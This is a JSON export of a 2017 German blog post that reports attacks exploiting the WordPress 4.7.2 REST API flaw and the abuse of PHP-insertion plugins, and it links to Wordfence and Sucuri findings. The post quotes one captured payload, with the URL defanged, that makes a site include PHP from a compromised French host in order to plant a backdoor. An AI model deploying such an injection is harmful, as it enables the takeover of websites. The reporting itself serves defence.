{"id":187479,"date":"2017-02-14T07:06:55","date_gmt":"2017-02-14T06:06:55","guid":{"rendered":"http:\/\/www.borncity.com\/blog\/?p=187479"},"modified":"2022-04-05T05:22:02","modified_gmt":"2022-04-05T03:22:02","slug":"neues-zu-hacks-ber-die-wordpress-sicherheitslcke","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2017\/02\/14\/neues-zu-hacks-ber-die-wordpress-sicherheitslcke\/","title":{"rendered":"Neues zu Hacks per WordPress-Sicherheitslücke"},"content":{"rendered":"

\"\"Die WordPress-Entwickler haben ja Ende Januar die Version 4.7.2 ver\u00f6ffentlicht (siehe WordPress Version 4.7.2 verf\u00fcgbar<\/a>) mit der stillschweigend eine Sicherheitsl\u00fccke geschlossen wurde. Jetzt wird bekannt, dass die L\u00fccke in der REST-API f\u00fcr das Einschleusen von Schadcode genutzt wird. Und ein WordPress-Auftritt wurde bei einem \u00e4lteren Hack als C&C-Server missbraucht. <\/p>\n

<\/p>\n

REST-API-L\u00fccke f\u00fcr Manipulationen genutzt<\/h3>\n

\"\"Die Sicherheitsl\u00fccke in der REST API von WordPress wurde nach den Beobachtungen des Wordfence-Sicherheitsteams in \u00fcber 20 Kampagnen genutzt, um Angriffe auf WordPress-Blogs zu fahren. Dabei wurden Inhalte bestehender Seiten ver\u00e4ndert. Ich hatte in mehreren Blog-Beitr\u00e4gen \u00fcber das Thema berichtet (siehe Linkliste am Artikelende). Eine vollst\u00e4ndiger Auflistung der Kampagnen und weitere Details finden sich in diesem Wordfence-Blog-Beitrag<\/a>.<\/p>\n

Aber ich habe doch WordPress 4.7.2?<\/h3>\n

Im Artikel Neues zu den WordPress-Hacks \u2026<\/a> hatte ich es bereits anklingen lassen. Es meldeten sich Leute, die WordPress 4.7.2 installiert hatten, aber trotzdem angegriffen wurden. Meine Vermutung: Dass vielleicht nicht alles abgedichtet wurde. <\/p>\n

Vor einigen Tagen ist mir von Sucuri der Hinweis auf deren Blog-Beitrag hier<\/a> zugegangen. Die Hacker schauen, ob die WordPress-Installationen Plugins wie Insert PHP oder Exec- PHP oder \u00e4hnlich verwenden. \u00dcber die Plugins l\u00e4sst sich PHP-Code direkt in einen Beitrag einschleusen. Das erleichtert zwar die Anpassung der Seiten, rei\u00dft aber auch Sicherheitsl\u00fccken auf. In einer ersten Kampagne wurde nun beobachtet, dass Hacker versuchten, den folgenden Code zu injizieren.<\/p>\n

content:\"[insert_php] include('http[:]\/\/acommeamour.fr\/tmp\/xx.php'); [\/insert_php]\n[php] include('http[:]\/\/acommeamour.fr\/tmp\/xx.php'); [\/php]\",\n\"id\":\"61a\"}<\/pre>\n
Der von der kompromittierten franz\u00f6sischen Webseite eingebundene Code installiert dann eine Backdoor in der WordPress-Installation. Ziel ist es, \u00fcber SEO-Spam, Affiliate Links oder eingestreute Werbeeinblendungen Geld zu machen. Bei Sururi gibt man die Empfehlung, auf solche PHP-Plugins zu verzichten und schreibt, dass die Sucuri-Firewall eine WordPress-Installation vor diesen Angriffe sch\u00fctze. Ein paar Infos finden sich auch in diesem Bleeping Computer-Beitrag<\/a>. Wer noch nicht auf WordPress 4.7.2 umgestellt hat, f\u00e4hrt also auf Risiko. <\/p>\n
Hack der US-Demokraten: WordPress-Server involviert<\/h3>\n
Und abschlie\u00dfend noch ein Informationsh\u00e4ppchen im Nachgang. Im Sommer 2016 besch\u00e4ftigte ja die Medien der Hack der US-Demokraten die Medien. Im Vorfeld der US-Pr\u00e4sidentschaftswahlen wurden Dokumente und E-Mails der Demokraten geleaked. Das Department of Homeland Security hat einen Report [PDF]<\/a> mit Details ver\u00f6ffentlicht. Die Sicherheitsspezialisten von Wordfence haben sich die Details angesehen und diesen Blog-Beitrag<\/a> ver\u00f6ffentlicht. Dabei wurde ein WordPress-Auftritt gehackt, so dass er als C&C-Server zur Verteilung von Windows-Malware funktionierte. <\/p>\n
\u00c4hnliche Artikel:<\/strong>
WordPress Version 4.7.2 verf\u00fcgbar<\/a>
WordPress 4.7.2 und die verschwiegene Sicherheitsl\u00fccke \u2013 deutsche Sites betroffen<\/a>
Neues zu den WordPress-Hacks \u2026<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Die WordPress-Entwickler haben ja Ende Januar die Version 4.7.2 ver\u00f6ffentlicht (siehe WordPress Version 4.7.2 verf\u00fcgbar) mit der stillschweigend eine Sicherheitsl\u00fccke geschlossen wurde. Jetzt wird bekannt, dass die L\u00fccke in der REST-API f\u00fcr das Einschleusen von Schadcode genutzt wird. Und ein … Weiterlesen →<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426,1574],"tags":[4328,4349],"class_list":["post-187479","post","type-post","status-publish","format-standard","hentry","category-sicherheit","category-wordpress","tag-sicherheit","tag-wordpress"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/187479","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=187479"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/187479\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=187479"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=187479"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=187479"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}